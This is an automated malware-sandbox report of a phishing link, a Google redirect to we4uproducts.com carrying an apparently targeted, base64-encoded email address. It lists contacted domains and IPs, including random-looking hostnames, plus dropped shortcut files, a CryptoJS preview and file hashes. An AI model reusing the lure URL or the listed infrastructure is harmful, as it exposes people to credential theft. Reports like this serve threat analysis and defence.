                                                                                                                                                                                                                                                                                      a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      142.250.184.196
                                                                                                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      104.18.65.57
                                                                                                                                                                                                                                                                                      cdn.optimizely.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      18.244.18.73
                                                                                                                                                                                                                                                                                      js-cdn.dynatrace.comUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      104.21.49.199
                                                                                                                                                                                                                                                                                      r1uobwimx4bmcqjx1tntpxzrsxndswjyzzab0epewnu1wq7tcw6y0hbumhbq.ornowstle.ruUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      104.18.95.41
                                                                                                                                                                                                                                                                                      challenges.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      63.140.62.17
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      15224OMNITUREUSfalse
                                                                                                                                                                                                                                                                                      172.64.155.119
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                                                                                                      35.190.19.88
                                                                                                                                                                                                                                                                                      gke-ingress.bluecore.comUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      151.101.130.92
                                                                                                                                                                                                                                                                                      s2-cloudinary-pin-sni.map.fastly.netUnited States
                                                                                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                      104.17.25.14
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      104.18.66.57
                                                                                                                                                                                                                                                                                      a19065870423.cdn.optimizely.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      18.66.102.106
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                      52.208.241.210
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      18.203.166.1
                                                                                                                                                                                                                                                                                      dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      99.86.4.79
                                                                                                                                                                                                                                                                                      cnstrc.comUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      142.250.186.131
                                                                                                                                                                                                                                                                                      www.google.co.ukUnited States
                                                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                                                      151.101.194.137
                                                                                                                                                                                                                                                                                      code.jquery.comUnited States
                                                                                                                                                                                                                                                                                      54113FASTLYUSfalse
                                                                                                                                                                                                                                                                                      104.16.79.73
                                                                                                                                                                                                                                                                                      static.cloudflareinsights.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      172.67.222.46
                                                                                                                                                                                                                                                                                      cugobbs97qwf9gjbojuj9yxf6kyyiytmg8lbt4cjoujssnl01j4essytivo.tardfaca.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      104.17.24.14
                                                                                                                                                                                                                                                                                      cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      52.17.200.40
                                                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      213.5.71.85
                                                                                                                                                                                                                                                                                      we4uproducts.comNetherlands
                                                                                                                                                                                                                                                                                      51430ALTUSNLfalse
                                                                                                                                                                                                                                                                                      18.245.86.4
                                                                                                                                                                                                                                                                                      e309da9b9aaf.cdn4.forter.comUnited States
                                                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                                                      188.114.96.3
                                                                                                                                                                                                                                                                                      fkmd.lioninkey.comEuropean Union
                                                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                                                      18.66.102.74
                                                                                                                                                                                                                                                                                      dycxm6nnyo2aj.cloudfront.netUnited States
                                                                                                                                                                                                                                                                                      3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                                                      192.168.2.17
                                                                                                                                                                                                                                                                                      192.168.2.16
                                                                                                                                                                                                                                                                                      192.168.2.23
                                                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                                                      Analysis ID:1541538
                                                                                                                                                                                                                                                                                      Start date and time:2024-10-25 00:05:09 +02:00
                                                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                                                      Overall analysis duration:0h 3m 54s
                                                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                                                      Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                                                                                                                      Sample URL:https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:13
                                                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                                                      Classification:mal52.phis.win@31/183@130/35
                                                                                                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.16.206, 64.233.167.84, 217.20.57.34, 34.104.35.123, 2.23.196.103, 184.28.89.29, 104.18.4.177, 104.18.5.177, 216.58.212.163, 142.250.185.99, 142.250.186.110, 2.16.241.75, 2.16.241.87, 2.16.241.85, 2.16.241.86, 2.16.241.93, 104.17.201.1, 104.17.202.1, 104.102.38.212, 184.27.96.174, 2.23.196.132, 2.16.241.70, 2.16.241.72, 142.250.185.232, 52.212.56.148, 52.17.97.65, 54.77.122.229
                                                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, e39980.dscx.akamaiedge.net, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, sephora-track.inside-graph.com.cdn.cloudflare.net, e31660.dscx.akamaiedge.net, ip46s2.go-mpulse.net.edgekey.net, clients2.google.com, snir.asos-media.com.edgekey.net, www.googletagmanager.com, update.googleapis.com, snir.asosservices.com.edgekey.net, www.gstatic.com, snir.www.asos.com.edgekey.net, e3568.x.akamaiedge.net, e31538.dscx.akamaiedge.net, e4518.dscx.akamaiedge.net, clients1.google.com, fs.microsoft.com, accounts.google.com, cm.everesttech.net.akadns.net, ctldl.windowsupdate.com, e9858.dscx.akamaiedge.net, snir.asos.com.edgekey.net, fe3cr.delivery.mp.microsoft.com, e4518.dscapi7.akamaiedge.net, edgedl.me.gvt1.com, www.sephora.com.edgekey.net, e7808.dscg.akamaiedge.net, wildcard46.go-mpulse.net.edgekey.net, resc.cloudinary.com.cdn.cloudflare.net, clients.l.google.com, reporting.go-mpulse.net.edgekey.net, e31554.dscx.akamaiedge.net, 2-0
                                                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                                                      • VT rate limit hit for: https://www.google.co.uk/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp%2Fwe4uproducts.com/cbb/lld/jjg/5BVvnI7cfJ4HfuhWZvVda7dK/am9yZGFuLmJsYWNrQGxlYXJmaWVsZC5jb20=
                                                                                                                                                                                                                                                                                      No simulations
                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                      No context
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 21:05:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2673
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9876619926155494
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:85d/T3j3HDidAKZdA1FehwiZUklqehYy+3:8LfdHy
                                                                                                                                                                                                                                                                                      MD5:18C2739EE74BBC65406362612ABE444B
                                                                                                                                                                                                                                                                                      SHA1:A6D7C570C6FA719E0E75B03884DA66F9E3AAE042
                                                                                                                                                                                                                                                                                      SHA-256:34842CFC35176F0DBBE9783DD82CC5D5F334EF5C6AACF900097A1FE11E050477
                                                                                                                                                                                                                                                                                      SHA-512:A8ADF6249D8B602670E4F748D692DF22DD753CC46315A0A0F81D7F4A4312B10777726D1572E8BBDAD4653CA02669A1B46378830151AC69CC700BE0A3C4A93F9E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......).`&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 21:05:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2675
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.004126023931662
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:8Bd/T3j3HDidAKZdA1seh/iZUkAQkqeh3y+2:8DfT9QWy
                                                                                                                                                                                                                                                                                      MD5:3FAF6C527D814D7E845ACA4E12330589
                                                                                                                                                                                                                                                                                      SHA1:452E66FED20C9AC5998FC2227C8198848AA64C89
                                                                                                                                                                                                                                                                                      SHA-256:0F0453D3959F41D2A47F50567DCC7401118BB061401DDF3FCC6358BE9AE493D6
                                                                                                                                                                                                                                                                                      SHA-512:CDE5109F0C315D4A0283EF7C9A65592DFBDA0CBD071FA585C9F5BBBD9263FF264FAFBA5BF3B6522CDFD96EE1B562E27B2B802F8C49CD92D984A003139A973D1F
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,...../..`&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2689
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.010582094246762
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:88d/T3jAHDidAKZdA14meh7sFiZUkmgqeh7s1y+BX:8kfCnDy
                                                                                                                                                                                                                                                                                      MD5:A90E36E5DDA75E09F4EEFF36D0468959
                                                                                                                                                                                                                                                                                      SHA1:5B4D46513AC6A082142155DA3909578C9706EF3A
                                                                                                                                                                                                                                                                                      SHA-256:510BB8354F9C7A4C9B80A3FE3EE5C414C7AC8FFE20985F81610F5290A1EFB536
                                                                                                                                                                                                                                                                                      SHA-512:735BDF04916BD94E6A486B7B3AFC628127C9D75149E3881E575F40B194A09CF21C895DBC9294A65CD57CA0138C643D031F2EF07721129D04A80ECD02B27D8FD4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 21:05:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.00222405042589
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:8Bd/T3j3HDidAKZdA1TehDiZUkwqeh7y+R:8DfgNy
                                                                                                                                                                                                                                                                                      MD5:ABD0259F36FD44BDDE88229A3AB23941
                                                                                                                                                                                                                                                                                      SHA1:94ADAFE3235A7019B36F30D8DD072D32F4E43862
                                                                                                                                                                                                                                                                                      SHA-256:D4CCE152F1F639FCAECBDDD4DB10F7FAA00259EB2B75F9775ABE900E85E04E45
                                                                                                                                                                                                                                                                                      SHA-512:6FB5975877B3830DC05DF3C08103BA9FD768CF94A203A11B17620DDD44E21086D505C898FB8663BF970931238A1255EE0B17E800A8A7993BC05D728FFA550DB4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....Q..`&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 21:05:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2677
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9927583059810265
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:8pd/T3j3HDidAKZdA1dehBiZUk1W1qehxy+C:87fg9Ry
                                                                                                                                                                                                                                                                                      MD5:7A2D5DE8EFE38F3A43DEB458DEB6B6A9
                                                                                                                                                                                                                                                                                      SHA1:D5C89D1D9ABC8BBCB41816B1EE8DB1829CC1EAE1
                                                                                                                                                                                                                                                                                      SHA-256:DF871A9B2A5094FC84D30DA9570349F76C2CFFB46CC6F789FA5C46AC4B722D72
                                                                                                                                                                                                                                                                                      SHA-512:1CF7ADA8373D66F34D210755954A1AB4AAC7F3955E382BBC250A079727189DB747E882656F7077DBBA0BE8F906161421E2E12C0C18E3E360CFB36C687DA04B3A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,......#.`&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 21:05:40 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2679
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9983844273997566
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:8ed/T3j3HDidAKZdA1duTeehOuTbbiZUk5OjqehOuTbDy+yT+:8ifyTfTbxWOvTbDy7T
                                                                                                                                                                                                                                                                                      MD5:AD70C88FC2FAB62030F7D3D3FE162AFC
                                                                                                                                                                                                                                                                                      SHA1:651CC2E1BAABA478989656968B34F9BAD761FCE9
                                                                                                                                                                                                                                                                                      SHA-256:985F97671A78703D8CBD76FECCEE04E3CCCD74689EB7F8746252E78002010E8B
                                                                                                                                                                                                                                                                                      SHA-512:8BFA893214C6E152203E8FDD56B4934EB6EBB3958C54D8356DEB10913EC77C89BD3D75E1F0697156C7DD2A986D954C71628C99B78D3D79F17D372907E74E489A
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.... D..`&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IXY......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........ht.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):48316
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65534), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):227898
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.38498285820349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3072:tOfnGOo43+EG6hF8bfQc8NJAyxDscqhZGkzyxtznqnYUv+dIbLEOKv:TOo43U4c8QT2pnqbv+dIbLEOW
                                                                                                                                                                                                                                                                                      MD5:483833CB6162C627DE1845CB475A73B9
